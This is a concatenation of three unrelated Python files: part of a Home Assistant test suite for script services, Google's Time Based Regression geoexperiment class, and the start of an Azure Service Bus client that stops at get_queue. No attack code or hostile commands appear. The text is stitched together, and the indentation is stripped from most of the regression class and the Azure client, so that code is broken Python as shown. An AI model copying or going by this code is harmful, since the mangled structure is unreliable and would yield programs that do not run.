    def tear_down_cleanup(self):
        """Stop down everything that was started."""
        self.hass.stop()

    def test_turn_on_service(self):
        """Verify that the turn_on service."""
        event = "test_event"
        events = []

        @callback
        def record_event(event):
            """Add recorded event to set."""
            events.append(event)

        self.hass.bus.listen(event, record_event)

        assert setup_component(
            self.hass,
            "script",
            {
                "script": {
                    "test": {"sequence": [{"delay": {"seconds": 5}}, {"event": event}]}
                }
            },
        )

        turn_on(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        # The script is blocked on the 5 second delay, so it is "on" but the
        # event at the end of the sequence has not fired yet.
        assert script.is_on(self.hass, ENTITY_ID)
        assert 0 == len(events)

        # Calling turn_on a second time should not advance the script
        turn_on(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        assert 0 == len(events)

        # Turning the script off cancels it before the event fires.
        turn_off(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        assert not script.is_on(self.hass, ENTITY_ID)
        assert 0 == len(events)

    def test_toggle_service(self):
        """Test the toggling of a service."""
        event = "test_event"
        events = []

        @callback
        def record_event(event):
            """Add recorded event to set."""
            events.append(event)

        self.hass.bus.listen(event, record_event)

        assert setup_component(
            self.hass,
            "script",
            {
                "script": {
                    "test": {"sequence": [{"delay": {"seconds": 5}}, {"event": event}]}
                }
            },
        )

        # First toggle starts the script (blocked on the delay)...
        toggle(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        assert script.is_on(self.hass, ENTITY_ID)
        assert 0 == len(events)

        # ...second toggle cancels it before the event fires.
        toggle(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        assert not script.is_on(self.hass, ENTITY_ID)
        assert 0 == len(events)

    def test_passing_variables(self):
        """Test different ways of passing in variables."""
        calls = []
        context = Context()

        @callback
        def record_call(service):
            """Add recorded event to set."""
            calls.append(service)

        self.hass.services.register("test", "script", record_call)

        assert setup_component(
            self.hass,
            "script",
            {
                "script": {
                    "test": {
                        "sequence": {
                            "service": "test.script",
                            "data_template": {"hello": "{{ greeting }}"},
                        }
                    }
                }
            },
        )

        # Variables can be passed via the legacy turn_on helper...
        turn_on(self.hass, ENTITY_ID, {"greeting": "world"}, context=context)
        self.hass.block_till_done()
        assert len(calls) == 1
        assert calls[0].context is context
        assert calls[0].data["hello"] == "world"

        # ...or directly as service data of the script's own service.
        self.hass.services.call(
            "script", "test", {"greeting": "universe"}, context=context
        )
        self.hass.block_till_done()
        assert len(calls) == 2
        assert calls[1].context is context
        assert calls[1].data["hello"] == "universe"
# Script configurations that config validation must reject: empty config
# (no sequence), an object id containing spaces, an action that mixes
# 'event' and 'service' keys, and an invalid option combination with
# parallel mode.
invalid_configs = [
    {"test": {}},
    {"test hello world": {"sequence": [{"event": "bla"}]}},
    {"test": {"sequence": {"event": "test_event", "service": "homeassistant.turn_on"}}},
    {"test": {"sequence": [], "mode": "parallel", "queue_size": 5}},
]
@pytest.mark.parametrize("value", invalid_configs)
async def test_setup_with_invalid_configs(hass, value):
    """Test setup with invalid configs."""
    setup_ok = await async_setup_component(hass, "script", {"script": value})
    assert not setup_ok, f"Script loaded with wrong config {value}"
    # No script entities may have been created from a rejected config.
    assert len(hass.states.async_entity_ids("script")) == 0
@pytest.mark.parametrize("running", ["no", "same", "different"])
async def test_reload_service(hass, running):
    """Verify the reload service."""
    assert await async_setup_component(
        hass, "script", {"script": {"test": {"sequence": [{"delay": {"seconds": 5}}]}}}
    )
    assert hass.states.get(ENTITY_ID) is not None
    assert hass.services.has_service(script.DOMAIN, "test")

    if running != "no":
        # Start the script so it is mid-run (blocked on the delay) when the
        # reload happens.
        _, object_id = split_entity_id(ENTITY_ID)
        await hass.services.async_call(DOMAIN, object_id)
        await hass.async_block_till_done()

        assert script.is_on(hass, ENTITY_ID)

    # Reload with either the same object id ("same") or a different one.
    object_id = "test" if running == "same" else "test2"
    with patch(
        "homeassistant.config.load_yaml_config_file",
        return_value={"script": {object_id: {"sequence": [{"delay": {"seconds": 5}}]}}},
    ):
        await hass.services.async_call(DOMAIN, SERVICE_RELOAD, blocking=True)
        await hass.async_block_till_done()

    if running != "same":
        # The original entity and service are gone; the new ones exist.
        assert hass.states.get(ENTITY_ID) is None
        assert not hass.services.has_service(script.DOMAIN, "test")

        assert hass.states.get("script.test2") is not None
        assert hass.services.has_service(script.DOMAIN, "test2")
    else:
        assert hass.states.get(ENTITY_ID) is not None
        assert hass.services.has_service(script.DOMAIN, "test")
async def test_service_descriptions(hass):
    """Test that service descriptions are loaded and reloaded correctly."""
    # Test 1: has "description" but no "fields"
    assert await async_setup_component(
        hass,
        "script",
        {
            "script": {
                "test": {
                    "description": "test description",
                    "sequence": [{"delay": {"seconds": 5}}],
                }
            }
        },
    )

    descriptions = await async_get_all_descriptions(hass)

    assert descriptions[DOMAIN]["test"]["description"] == "test description"
    assert not descriptions[DOMAIN]["test"]["fields"]

    # Test 2: has "fields" but no "description" — reload with the new config
    # and verify the description falls back to "" while fields are exposed.
    with patch(
        "homeassistant.config.load_yaml_config_file",
        return_value={
            "script": {
                "test": {
                    "fields": {
                        "test_param": {
                            "description": "test_param description",
                            "example": "test_param example",
                        }
                    },
                    "sequence": [{"delay": {"seconds": 5}}],
                }
            }
        },
    ):
        await hass.services.async_call(DOMAIN, SERVICE_RELOAD, blocking=True)
    descriptions = await async_get_all_descriptions(hass)

    assert descriptions[script.DOMAIN]["test"]["description"] == ""
    assert (
        descriptions[script.DOMAIN]["test"]["fields"]["test_param"]["description"]
        == "test_param description"
    )
    assert (
        descriptions[script.DOMAIN]["test"]["fields"]["test_param"]["example"]
        == "test_param example"
    )
async def test_shared_context(hass):
    """Test that the shared context is passed down the chain."""
    event = "test_event"
    context = Context()

    event_mock = Mock()
    run_mock = Mock()

    hass.bus.async_listen(event, event_mock)
    hass.bus.async_listen(EVENT_SCRIPT_STARTED, run_mock)

    assert await async_setup_component(
        hass, "script", {"script": {"test": {"sequence": [{"event": event}]}}}
    )

    await hass.services.async_call(
        DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID}, context=context
    )
    await hass.async_block_till_done()

    # Both the "script started" event and the script's own event fired once,
    # carrying the caller's context.
    assert event_mock.call_count == 1
    assert run_mock.call_count == 1

    args, kwargs = run_mock.call_args
    assert args[0].context == context
    # Ensure event data has all attributes set
    assert args[0].data.get(ATTR_NAME) == "test"
    assert args[0].data.get(ATTR_ENTITY_ID) == "script.test"

    # Ensure context carries through the event
    args, kwargs = event_mock.call_args
    assert args[0].context == context

    # Ensure the script state shares the same context
    state = hass.states.get("script.test")
    assert state is not None
    assert state.context == context
async def test_logging_script_error(hass, caplog):
    """Test logging script error."""
    config = {"script": {"hello": {"sequence": [{"service": "non.existing"}]}}}
    assert await async_setup_component(hass, "script", config)

    # Calling a sequence that references a missing service must raise and
    # also be logged.
    with pytest.raises(ServiceNotFound) as err:
        await hass.services.async_call("script", "hello", blocking=True)

    assert err.value.domain == "non"
    assert err.value.service == "existing"
    assert "Error executing script" in caplog.text
async def test_turning_no_scripts_off(hass):
    """Test it is possible to turn two scripts off."""
    assert await async_setup_component(hass, "script", {})

    # Testing it doesn't raise
    empty_target = {"entity_id": []}
    await hass.services.async_call(
        DOMAIN, SERVICE_TURN_OFF, empty_target, blocking=True
    )
async def test_async_get_descriptions_script(hass):
    """Test async_set_service_schema for the script integration."""
    script_config = {
        DOMAIN: {
            "test1": {"sequence": [{"service": "homeassistant.restart"}]},
            "test2": {
                "description": "test2",
                "fields": {
                    "param": {
                        "description": "param_description",
                        "example": "param_example",
                    }
                },
                "sequence": [{"service": "homeassistant.restart"}],
            },
        }
    }

    await async_setup_component(hass, DOMAIN, script_config)
    descriptions = await hass.helpers.service.async_get_all_descriptions()

    # test1 declares neither description nor fields; both default to empty.
    assert descriptions[DOMAIN]["test1"]["description"] == ""
    assert not descriptions[DOMAIN]["test1"]["fields"]

    # test2's description and field metadata are passed through verbatim.
    assert descriptions[DOMAIN]["test2"]["description"] == "test2"
    assert (
        descriptions[DOMAIN]["test2"]["fields"]["param"]["description"]
        == "param_description"
    )
    assert (
        descriptions[DOMAIN]["test2"]["fields"]["param"]["example"] == "param_example"
    )
async def test_extraction_functions(hass):
    """Test extraction functions."""
    assert await async_setup_component(
        hass,
        DOMAIN,
        {
            DOMAIN: {
                "test1": {
                    "sequence": [
                        {
                            "service": "test.script",
                            "data": {"entity_id": "light.in_both"},
                        },
                        {
                            "service": "test.script",
                            "data": {"entity_id": "light.in_first"},
                        },
                        {"domain": "light", "device_id": "device-in-both"},
                    ]
                },
                "test2": {
                    "sequence": [
                        {
                            "service": "test.script",
                            "data": {"entity_id": "light.in_both"},
                        },
                        {
                            "condition": "state",
                            "entity_id": "sensor.condition",
                            "state": "100",
                        },
                        {"scene": "scene.hello"},
                        {"domain": "light", "device_id": "device-in-both"},
                        {"domain": "light", "device_id": "device-in-last"},
                    ],
                },
            }
        },
    )

    # Entities/devices referenced in the sequences above must be reported by
    # the forward (script -> refs) and reverse (ref -> scripts) helpers.
    assert set(script.scripts_with_entity(hass, "light.in_both")) == {
        "script.test1",
        "script.test2",
    }
    assert set(script.entities_in_script(hass, "script.test1")) == {
        "light.in_both",
        "light.in_first",
    }
    assert set(script.scripts_with_device(hass, "device-in-both")) == {
        "script.test1",
        "script.test2",
    }
    assert set(script.devices_in_script(hass, "script.test2")) == {
        "device-in-both",
        "device-in-last",
    }
async def test_config_basic(hass):
    """Test passing info in config."""
    script_config = {
        "script": {
            "test_script": {
                "alias": "Script Name",
                "icon": "mdi:party",
                "sequence": [],
            }
        }
    }
    assert await async_setup_component(hass, "script", script_config)

    # alias and icon from the config must surface on the entity state.
    state = hass.states.get("script.test_script")
    assert state.name == "Script Name"
    assert state.attributes["icon"] == "mdi:party"
async def test_config_legacy(hass, caplog):
    """Test config defaulting to legacy mode."""
    legacy_config = {"script": {"test_script": {"sequence": []}}}
    assert await async_setup_component(hass, "script", legacy_config)

    deprecation_notice = "To continue using previous behavior, which is now deprecated"
    assert deprecation_notice in caplog.text
async def test_logbook_humanify_script_started_event(hass):
    """Test humanifying script started event."""
    hass.config.components.add("recorder")
    await async_setup_component(hass, DOMAIN, {})
    await async_setup_component(hass, "logbook", {})
    entity_attr_cache = logbook.EntityAttributeCache(hass)

    # Feed two EVENT_SCRIPT_STARTED events through logbook.humanify and
    # check each is rendered with the script's name, domain and entity id.
    event1, event2 = list(
        logbook.humanify(
            hass,
            [
                MockLazyEventPartialState(
                    EVENT_SCRIPT_STARTED,
                    {ATTR_ENTITY_ID: "script.hello", ATTR_NAME: "Hello Script"},
                ),
                MockLazyEventPartialState(
                    EVENT_SCRIPT_STARTED,
                    {ATTR_ENTITY_ID: "script.bye", ATTR_NAME: "Bye Script"},
                ),
            ],
            entity_attr_cache,
        )
    )

    assert event1["name"] == "Hello Script"
    assert event1["domain"] == "script"
    assert event1["message"] == "started"
    assert event1["entity_id"] == "script.hello"

    assert event2["name"] == "Bye Script"
    assert event2["domain"] == "script"
    assert event2["message"] == "started"
    assert event2["entity_id"] == "script.bye"
@pytest.mark.parametrize("concurrently", [False, True])
async def test_concurrent_script(hass, concurrently):
    """Test calling script concurrently or not."""
    # When run concurrently, script1 starts script2 via script.turn_on (fire
    # and forget); otherwise it calls script2's own service and waits for it.
    if concurrently:
        call_script_2 = {
            "service": "script.turn_on",
            "data": {"entity_id": "script.script2"},
        }
    else:
        call_script_2 = {"service": "script.script2"}
    assert await async_setup_component(
        hass,
        "script",
        {
            "script": {
                "script1": {
                    "mode": "parallel",
                    "sequence": [
                        call_script_2,
                        {
                            "wait_template": "{{ is_state('input_boolean.test1', 'on') }}"
                        },
                        {"service": "test.script", "data": {"value": "script1"}},
                    ],
                },
                "script2": {
                    "mode": "parallel",
                    "sequence": [
                        {"service": "test.script", "data": {"value": "script2a"}},
                        {
                            "wait_template": "{{ is_state('input_boolean.test2', 'on') }}"
                        },
                        {"service": "test.script", "data": {"value": "script2b"}},
                    ],
                },
            }
        },
    )

    service_called = asyncio.Event()
    service_values = []

    async def async_service_handler(service):
        nonlocal service_values
        service_values.append(service.data.get("value"))
        service_called.set()

    hass.services.async_register("test", "script", async_service_handler)
    hass.states.async_set("input_boolean.test1", "off")
    hass.states.async_set("input_boolean.test2", "off")

    await hass.services.async_call("script", "script1")
    await asyncio.wait_for(service_called.wait(), 1)
    service_called.clear()

    # script2 has run its first action and is waiting on its wait_template;
    # both scripts are "on" at this point.
    assert "script2a" == service_values[-1]
    assert script.is_on(hass, "script.script1")
    assert script.is_on(hass, "script.script2")

    if not concurrently:
        # In sequential mode script1 is blocked until script2 finishes, so
        # release script2's wait_template first.
        hass.states.async_set("input_boolean.test2", "on")
        await asyncio.wait_for(service_called.wait(), 1)
        service_called.clear()

        assert "script2b" == service_values[-1]

    hass.states.async_set("input_boolean.test1", "on")
    await asyncio.wait_for(service_called.wait(), 1)
    service_called.clear()

    assert "script1" == service_values[-1]
    # In concurrent mode script2 is still waiting on its own template.
    assert concurrently == script.is_on(hass, "script.script2")

    if concurrently:
        hass.states.async_set("input_boolean.test2", "on")
        await asyncio.wait_for(service_called.wait(), 1)
        service_called.clear()

        assert "script2b" == service_values[-1]

    await hass.async_block_till_done()

    assert not script.is_on(hass, "script.script1")
    assert not script.is_on(hass, "script.script2")
|
|
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Time Based Regression geoexperiment methodology.
"""
import collections
import functools
from matched_markets.methodology import semantics
from matched_markets.methodology import utils
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy as sp
import statsmodels.api as sm
class TBR(object):
"""Time Based Regression geoexperiment methodology.
This class models the relationship between control and treatment time series.
For details see [Kerman 2017](https://ai.google/research/pubs/pub45950).
"""
  def __init__(self, use_cooldown=True):
    """Initializes a TBR analysis.

    Args:
      use_cooldown: bool. Whether cooldown period should be utilised.
    """
    # Column/index name mapping and group/period semantics; populated by
    # fit() from user-supplied kwargs.
    self.df_names = None
    self.groups = None
    self.periods = None
    # Group-wise aggregated time series, built by _construct_analysis_data().
    self.analysis_data = None
    # Name of the column being analysed (response or cost).
    self.target = None

    # Set up container for the response model, and potentially a cost model.
    self.pre_period_model = None
    self.use_cooldown = use_cooldown
  def fit(self, data_frame, target, **kwargs):
    """Fit the TBR model to the supplied data frame.

    See optional kwargs for interpretation of the data frame.

    Args:
      data_frame: a pandas.DataFrame. Should contain the columns and indices
      corresponding to the **kwargs information below. Only one of response
      or cost need be present, corresponding to the supplied `target`. Must be
      indexed by date.
      target: `str`. The name of the column to be analysed.
      **kwargs: optional column/index names for the data and related semantics:
        key_geo='geo' - geo data frame index name.
        key_period='period' - experimental period column name.
        key_group='group' - group assignment column name.
        key_cost='cost' - cost column name.
        key_response='response' - response column name.
        key_date='date' - date index name.
        key_incr_cost='_incr_cost' - incremental cost column name.
        key_incr_response='_incr_response' - incremental response column name.
        group_control=1 - value representing the control group in the data.
        group_treatment=2 - value representing the treatment group in the data.
        period_pre=0 - value representing the pre-test period in the data.
        period_test=1 - value representing the test period in the data.
        period_cool=2 - value representing the cooldown period in the data.
    """
    # Set the target of the analysis.
    self.target = target

    # Extract any column / index name information supplied by the user.
    # kwarg_subdict collects kwargs sharing the given prefix.
    user_df_names = utils.kwarg_subdict('key_', **kwargs)
    self.df_names = semantics.DataFrameNameMapping(**user_df_names)

    # Extract any semantics for control / treatment supplied by user.
    user_group_semantics = utils.kwarg_subdict('group_', **kwargs)
    self.groups = semantics.GroupSemantics(**user_group_semantics)

    # Extract any semantics for experimental period supplied by user.
    user_period_semantics = utils.kwarg_subdict('period_', **kwargs)
    self.periods = semantics.PeriodSemantics(**user_period_semantics)

    # Set up the analysis data.
    self._construct_analysis_data(data_frame)

    # Fit pre-period models for response and for cost.
    self._fit_pre_period_model()
def _construct_analysis_data(self, data):
"""Stores group-wise time series by aggregating over control/treat geos."""
preserve = [self.df_names.group, self.df_names.date]
agg_style = {
self.target: 'sum',
self.df_names.period: 'max' # preserve the period info of the ts.
}
self.analysis_data = data.groupby(preserve).agg(agg_style)
def _fit_pre_period_model(self):
"""Estimates the control-treatment relationship in the pre-period."""
# Get the pre- period data in the form needed for regression.
period_index = self.analysis_data[self.df_names.period] == self.periods.pre
treat_vec = self._response_vector(period_index)
cntrl_mat = self._design_matrix(period_index)
# Fit an OLS model to the pre- period data.
self.pre_period_model = sm.OLS(treat_vec.values, cntrl_mat.values).fit()
def predict(self, cntrl_mat):
"""Counterfactual prediction for treatment group series in the test period.
Args:
cntrl_mat: a T by 2 `np.matrix`, representing a constant concatenated
to the control group time series, with T the test period length.
Returns:
A vector representing the expected treatment group time series.
"""
return self.pre_period_model.predict(cntrl_mat)
def _make_period_index(self, periods):
"""Returns an index for analysis_data rows in the desired time periods.
Args:
periods: int or non-empty iterable of int. The labels of the periods to
consider.
Returns: a pandas.Series of bools indicating whether each time point lies in
the supplied periods.
Raises:
ValueError: if an empty periods argument is passed.
"""
# Ensure we can iterate through periods.
if not isinstance(periods, collections.Iterable):
period_itr = (periods,)
else:
if periods:
period_itr = periods
else:
raise ValueError('Periods must not be an empty iterable.')
# Construct a list of bool valued pandas.Series indicating for each period
# whether each time point is in that period.
subset = self.analysis_data[self.df_names.period]
indices = [subset == i for i in period_itr]
return functools.reduce(np.logical_or, indices)
def causal_effect(self, periods):
"""Returns the difference of the actual and counterfactual prediction.
Args:
periods: int or iterable of int. The labels of the periods to consider.
Returns:
A vector representing the estimated causal effect of the treatment on the
target variable.
"""
period_index = self._make_period_index(periods)
# Get the test- period data in the form needed for regression.
treat_vec = self._response_vector(period_index)
cntrl_mat = self._design_matrix(period_index)
# Calculate the causal effect of the campaign.
treat_counter = self.predict(cntrl_mat)
return treat_vec - treat_counter
def _response_vector(self, period_index):
"""Return the treatment group's time-series for the specified period."""
adata = self.analysis_data
return adata[period_index].loc[self.groups.treatment][self.target]
def _design_matrix(self, period_index):
"""Return the design matrix for `periods`."""
# Short variable names
adata = self.analysis_data
cntrl = self.groups.control
target = self.target
# Construct the design matrix.
cntrl_vec = adata[period_index].loc[cntrl][target]
cntrl_mat = cntrl_vec.to_frame()
cntrl_mat.insert(0, 'const', 1)
return cntrl_mat
def causal_cumulative_distribution(self,
time=None,
rescale=1.0,
periods=None):
"""Return the distribution of the cumulative causal effect.
Args:
time: `int`. If specified, returns only the cumulative distribution at
this time index.
rescale: `float`. Additional scaling factor for the t-distribution.
periods: optional tuple of `int` (default None). The periods over which to
infer causal effects. If not supplied, the periods considered will include
the test period and also the cooldown period if the model was constructed
with use_cooldown=True.
Returns:
A t-distribution of type `scipy.stats._distn_infrastructure.rv_frozen`.
"""
# Define periods to credit to test.
if self.use_cooldown and periods is None:
periods = (self.periods.test, self.periods.cooldown)
elif periods is None:
periods = (self.periods.test,)
# Predict the causal effects of the experiment on response.
causal_response = self.causal_effect(periods)
# Counter of length test period.
period_index = self._make_period_index(periods)
cntrl_mat = self._design_matrix(period_index)
len_test = cntrl_mat.shape[0]
one_to_t = np.arange(1, len_test + 1)
one_to_t.shape = (len_test, 1)
# Scale contribution from parameters
cntrl_cum_mat = np.array(np.array(cntrl_mat.cumsum()) / one_to_t)
# Obtain the parameter covariance matrix.
vsigma = np.array(self.pre_period_model.cov_params())
# Each point in test-period has a different contribution.
var_params = []
for t in np.arange(len_test):
# Sum of parameter variance terms from eqn 5 of Kerman 2017.
var_t = (cntrl_cum_mat[t,] @ vsigma @ cntrl_cum_mat[t,].T)
var_params.append(var_t)
var_params = np.array(var_params).reshape(len_test, 1)
# Scale the results by T\sigma^2
var_from_params = var_params * one_to_t**2
# Scale contribution from test observations.
sigmasq = self.pre_period_model.scale
var_from_observations = one_to_t * sigmasq
# Set up the t-distribution.
delta_mean = rescale * np.array(np.cumsum(causal_response)).flatten()
delta_var = var_from_params + var_from_observations
delta_scale = rescale * sp.sqrt(delta_var).flatten()
delta_df = self.pre_period_model.df_resid
# Return a frozen t-distribution with the correct parameters.
if time is None:
return sp.stats.t(delta_df, loc=delta_mean, scale=delta_scale)
else:
return sp.stats.t(delta_df, loc=delta_mean[time], scale=delta_scale[time])
def summary(self, level=0.9,
threshold=0.0,
tails=1,
report='last',
rescale=1.0):
"""Summarise the posterior of the cumulative causal effect, Delta.
Args:
level: `float` in (0,1). Determines width of CIs.
threshold: `float`. Tests whether Delta is greater than threshold.
tails: `int` in {1,2}. Specifies number of tails to use in tests.
report: `str`, whether to report on 'all' or 'last' day in test period.
rescale: `float`, an additional scaling factor for Delta.
Returns:
pd.DataFrame, a summary at level, with alpha=1-level, containing:
- estimate, the median of Delta.
- precision, distance between the (1-level)/tails and 0.5 quantiles.
- lower, the value of the (1-level)/tails quantile.
- upper, if tails=2, the level/tails quantile, otherwise inf.
- scale, the scale parameter of Delta.
- level, records the level parameter used to generate the report.
- threshold, records the threshold parameter.
- probability, the probability that Delta > threshold.
Raises:
ValueError: if tails is neither 1 nor 2.
ValueError: if level is outside of the interval [0,1].
"""
# Enforce constraints on the arguments.
if tails not in (1, 2):
raise ValueError('tails should be either 1 or 2.')
if level < 0.0 or level > 1.0:
raise ValueError('level should be between 0.0 and 1.0.')
# Calculate the relevant points to evaluate.
alpha = (1-level) / tails
if tails == 1:
pupper = 1.0
elif tails == 2:
pupper = 1.0 - alpha
# Obtain the appropriate posterior distribution.
delta = self.causal_cumulative_distribution(rescale=rescale)
# Define periods to credit to test.
if self.use_cooldown:
periods = [self.periods.test, self.periods.cooldown]
else:
periods = [self.periods.test]
# Facts about the date index.
dates = self.causal_effect(periods).index
ndates = len(dates)
dates_ones = np.ones(ndates)
# Data for the report.
values = {
'dates': dates,
'estimate': delta.mean(),
'precision': np.abs(delta.ppf(alpha) - delta.ppf(0.5)).reshape(ndates),
'lower': delta.ppf(alpha).reshape(ndates),
'upper': delta.ppf(pupper).reshape(ndates),
'scale': delta.kwds['scale'].reshape(ndates),
'level': level * dates_ones,
'posterior_threshold': threshold * dates_ones,
'probability': 1.0 - delta.cdf(threshold).reshape(ndates)
}
# Ordering for the report.
ordering = ['estimate',
'precision',
'lower',
'upper',
'scale',
'level',
'probability',
'posterior_threshold'
]
# Construct the report, put it in the desired ordering.
result = pd.DataFrame(values, index=dates)
result = result[ordering]
# Decide how much of the report to report.
if report == 'all':
lines = result.shape[0]
elif report == 'last':
lines = 1
# Return the report for `lines` last days of the test period.
return result.tail(lines)
def plot(self, target, experiment_dates=None, margin=0.05):
"""Plot the control and treatment time series for the target variable.
Args:
target: str. The name of the target variable.
experiment_dates: iterable of str. Dates to mark with a vertical line.
margin: float. Determines the space at the top and bottom of the y-axis.
"""
# Labels of the group timeseries to be plotted.
groups = [self.groups.treatment, self.groups.control]
# Set the plotting limits.
column = self.analysis_data[target]
colmax = column.max()
colmin = column.min()
gap = margin*max(np.abs(colmax), margin*np.abs(colmin))
ymax = colmax + gap
ymin = colmin - gap
# Plot the timeseries.
for i in groups:
plt.plot(self.analysis_data.loc[i][target], label='Group %s' % i)
plt.legend()
plt.ylim((ymin, ymax))
# Place vertical lines on important dates.
if experiment_dates:
date_marks = pd.to_datetime(experiment_dates)
for dt in date_marks:
plt.vlines(dt, ymin, ymax, linestyles='dashed')
|
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
import datetime
import os
import time
from azure import (
_ETreeXmlToObject,
WindowsAzureError,
DEFAULT_HTTP_TIMEOUT,
SERVICE_BUS_HOST_BASE,
_dont_fail_not_exist,
_dont_fail_on_exist,
_encode_base64,
_get_request_body,
_get_request_body_bytes_only,
_int_or_none,
_sign_string,
_str,
_unicode_type,
_update_request_uri_query,
url_quote,
url_unquote,
_validate_not_none,
)
from azure.http import (
HTTPError,
HTTPRequest,
)
from azure.http.httpclient import _HTTPClient
from azure.servicebus import (
AZURE_SERVICEBUS_NAMESPACE,
AZURE_SERVICEBUS_ACCESS_KEY,
AZURE_SERVICEBUS_ISSUER,
_convert_event_hub_to_xml,
_convert_topic_to_xml,
_convert_response_to_topic,
_convert_queue_to_xml,
_convert_response_to_queue,
_convert_subscription_to_xml,
_convert_response_to_subscription,
_convert_rule_to_xml,
_convert_response_to_rule,
_convert_response_to_event_hub,
_convert_etree_element_to_queue,
_convert_etree_element_to_topic,
_convert_etree_element_to_subscription,
_convert_etree_element_to_rule,
_create_message,
_service_bus_error_handler,
)
class ServiceBusService(object):
def __init__(self, service_namespace=None, account_key=None, issuer=None,
x_ms_version='2011-06-01', host_base=SERVICE_BUS_HOST_BASE,
shared_access_key_name=None, shared_access_key_value=None,
authentication=None, timeout=DEFAULT_HTTP_TIMEOUT):
'''
Initializes the service bus service for a namespace with the specified
authentication settings (SAS or ACS).
service_namespace:
Service bus namespace, required for all operations. If None,
the value is set to the AZURE_SERVICEBUS_NAMESPACE env variable.
account_key:
ACS authentication account key. If None, the value is set to the
AZURE_SERVICEBUS_ACCESS_KEY env variable.
Note that if both SAS and ACS settings are specified, SAS is used.
issuer:
ACS authentication issuer. If None, the value is set to the
AZURE_SERVICEBUS_ISSUER env variable.
Note that if both SAS and ACS settings are specified, SAS is used.
x_ms_version:
Unused. Kept for backwards compatibility.
host_base:
Optional. Live host base url. Defaults to Azure url. Override this
for on-premise.
shared_access_key_name:
SAS authentication key name.
Note that if both SAS and ACS settings are specified, SAS is used.
shared_access_key_value:
SAS authentication key value.
Note that if both SAS and ACS settings are specified, SAS is used.
authentication:
Instance of authentication class. If this is specified, then
ACS and SAS parameters are ignored.
timeout:
Optional. Timeout for the http request, in seconds.
'''
self.requestid = None
self.service_namespace = service_namespace
self.host_base = host_base
if not self.service_namespace:
self.service_namespace = os.environ.get(AZURE_SERVICEBUS_NAMESPACE)
if not self.service_namespace:
raise WindowsAzureError('You need to provide servicebus namespace')
if authentication:
self.authentication = authentication
else:
if not account_key:
account_key = os.environ.get(AZURE_SERVICEBUS_ACCESS_KEY)
if not issuer:
issuer = os.environ.get(AZURE_SERVICEBUS_ISSUER)
if shared_access_key_name and shared_access_key_value:
self.authentication = ServiceBusSASAuthentication(
shared_access_key_name,
shared_access_key_value)
elif account_key and issuer:
self.authentication = ServiceBusWrapTokenAuthentication(
account_key,
issuer)
else:
raise WindowsAzureError(
'You need to provide servicebus access key and Issuer OR shared access key and value')
self._httpclient = _HTTPClient(service_instance=self, timeout=timeout)
self._filter = self._httpclient.perform_request
# Backwards compatibility:
# account_key and issuer used to be stored on the service class, they are
# now stored on the authentication class.
    @property
    def account_key(self):
        '''ACS account key; lives on the authentication object.'''
        return self.authentication.account_key
    @account_key.setter
    def account_key(self, value):
        self.authentication.account_key = value
    @property
    def issuer(self):
        '''ACS issuer; lives on the authentication object.'''
        return self.authentication.issuer
    @issuer.setter
    def issuer(self, value):
        self.authentication.issuer = value
def with_filter(self, filter):
'''
Returns a new service which will process requests with the specified
filter. Filtering operations can include logging, automatic retrying,
etc... The filter is a lambda which receives the HTTPRequest and
another lambda. The filter can perform any pre-processing on the
request, pass it off to the next lambda, and then perform any
post-processing on the response.
'''
res = ServiceBusService(
service_namespace=self.service_namespace,
authentication=self.authentication)
old_filter = self._filter
def new_filter(request):
return filter(request, old_filter)
res._filter = new_filter
return res
    def set_proxy(self, host, port, user=None, password=None):
        '''
        Sets the proxy server host and port for the HTTP CONNECT Tunnelling.
        host:
            Address of the proxy. Ex: '192.168.0.100'
        port:
            Port of the proxy. Ex: 6000
        user:
            User for proxy authorization.
        password:
            Password for proxy authorization.
        '''
        # Delegates to the underlying HTTP client, which owns the connection.
        self._httpclient.set_proxy(host, port, user, password)
    @property
    def timeout(self):
        '''Timeout (seconds) for HTTP requests; stored on the HTTP client.'''
        return self._httpclient.timeout
    @timeout.setter
    def timeout(self, value):
        self._httpclient.timeout = value
def create_queue(self, queue_name, queue=None, fail_on_exist=False):
'''
Creates a new queue. Once created, this queue's resource manifest is
immutable.
queue_name:
Name of the queue to create.
queue:
Queue object to create.
fail_on_exist:
Specify whether to throw an exception when the queue exists.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.body = _get_request_body(_convert_queue_to_xml(queue))
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_queue(self, queue_name, fail_not_exist=False):
'''
Deletes an existing queue. This operation will also remove all
associated state including messages in the queue.
queue_name:
Name of the queue to delete.
fail_not_exist:
Specify whether to throw an exception if the queue doesn't exist.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_queue(self, queue_name):
'''
